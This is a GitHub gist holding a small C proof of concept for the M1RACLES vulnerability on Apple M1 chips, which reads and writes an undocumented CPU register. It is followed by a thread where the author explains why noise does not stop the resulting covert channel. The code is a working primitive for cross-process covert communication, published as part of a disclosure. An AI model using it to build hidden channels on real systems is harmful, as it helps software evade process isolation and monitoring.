Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
/*
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
*
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
*
* Please visit m1racles.com for more information.
*
* Licensed under the MIT license.
*/
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
int main(int argc, char **argv)
{
uint64_t val;
if (argc > 1) {
val = atoi(argv[1]);
asm("msr s3_5_c15_c10_1, %x0" : : "r"(val));
} else {
asm("mrs %x0, s3_5_c15_c10_1" : "=r"(val));
printf("%llu\n", val);
}
return 0;
}
@ubdussamad

This comment has been minimized.

Copy link

@ubdussamad ubdussamad commented May 27, 2021

Hi, why can't a third process just mess with the communication by writing garbage data to the register every time it gets a lock?

@marcan

This comment has been minimized.

Copy link
Owner Author

@marcan marcan commented May 27, 2021

Hi, why can't a third process just mess with the communication by writing garbage data to the register every time it gets a lock?

It can, but adding noise is not an effective mitigation against covert channel communications, as you can always use error correction.

@ubdussamad

This comment has been minimized.

Copy link

@ubdussamad ubdussamad commented May 27, 2021

I see, but atleast it'll lower the data rate significantly, right? Thanks for the quick reply BTW. :)

@marcan

This comment has been minimized.

Copy link
Owner Author

@marcan marcan commented May 27, 2021

I see, but atleast it'll lower the data rate significantly, right? Thanks for the quick reply BTW. :)

Proportional to how much time you spend on it. If you peg a CPU core then you could halve the data rate of another CPU core trying to use the channel.

@vedoge

This comment has been minimized.

Copy link

@vedoge vedoge commented Jun 2, 2021

are "msr" and "mrs" supposed to be different? Looking at the code, it seems there is a mistake there. (I don't know ARM assembly)

@marcan

This comment has been minimized.

Copy link
Owner Author

@marcan marcan commented Jun 2, 2021

are "msr" and "mrs" supposed to be different? Looking at the code, it seems there is a mistake there. (I don't know ARM assembly)

Yes, they are.

https://developer.arm.com/documentation/dui0802/a/A64-General-Instructions/MSR--register-

https://developer.arm.com/documentation/dui0802/a/A64-General-Instructions/MRS

@vedoge

This comment has been minimized.

Copy link

@vedoge vedoge commented Jun 7, 2021

Got it. Thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment